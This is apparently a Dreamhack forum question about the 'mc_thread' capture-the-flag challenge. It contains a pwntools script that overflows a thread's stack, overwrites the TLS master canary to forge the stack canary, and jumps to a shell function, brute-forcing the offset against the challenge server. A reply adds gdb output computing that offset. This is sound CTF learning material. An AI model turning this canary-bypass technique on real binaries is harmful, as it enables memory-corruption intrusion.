Completed
Do I need to fuzz?
The exploit (the one Dreamhack shows in the exploit tech page) works perfectly locally, but on remote it doesn't work... I'm trying to bruteforce the distance between the payload and the master canary. Here is my script:

```python
from pwn import *

context.log_level = 'debug'
elf = ELF('./mc_thread')  # load once, outside the loop

for i in range(400, 9000, 8):
    # new connection for each candidate distance
    p = remote("host3.dreamhack.games", 17226)
    payload = b'A' * 264
    payload += b'A' * 8  # canary
    payload += b'B' * 8
    payload += p64(elf.symbols['giveshell'])
    payload += b'C' * (i - len(payload))
    payload += p64(0x404800 - 0x972)
    payload += b'C' * 0x10
    payload += p64(0x4141414141414141)
    inp_sz = len(payload) // 8
    p.sendlineafter(b'Size: ', str(inp_sz).encode())
    p.sendafter(b'Data: ', payload)
    p.sendline(b"cat flag")  # bytes, not str
    data = p.recvallS(timeout=3)
    p.close()  # close before the next attempt
    if "DH{" in data:
        print(data)
        break
```
Is it overkill, and can I understand the distance there is on remote? Or do I really need to bruteforce? Thanks in advance.
#system_hacking
#master_canary
#mc_thread
Answers (2)
FRACCHETTO
If run in the Dockerfile, the distance is kinda large, but the steps are also the ones shown in the exploit tech page...

```
(gdb) x/x $rbp-0x110
0x7ffff7d8bd40: 0x0000000000000000
(gdb) x/gx $fs_base+0x28
0x7ffff7d8c668: 0x8d3bade0f4598900
(gdb) p/x ($fs_base + 0x28) - 0x7ffff7d7dd40
$1 = 0xe928
```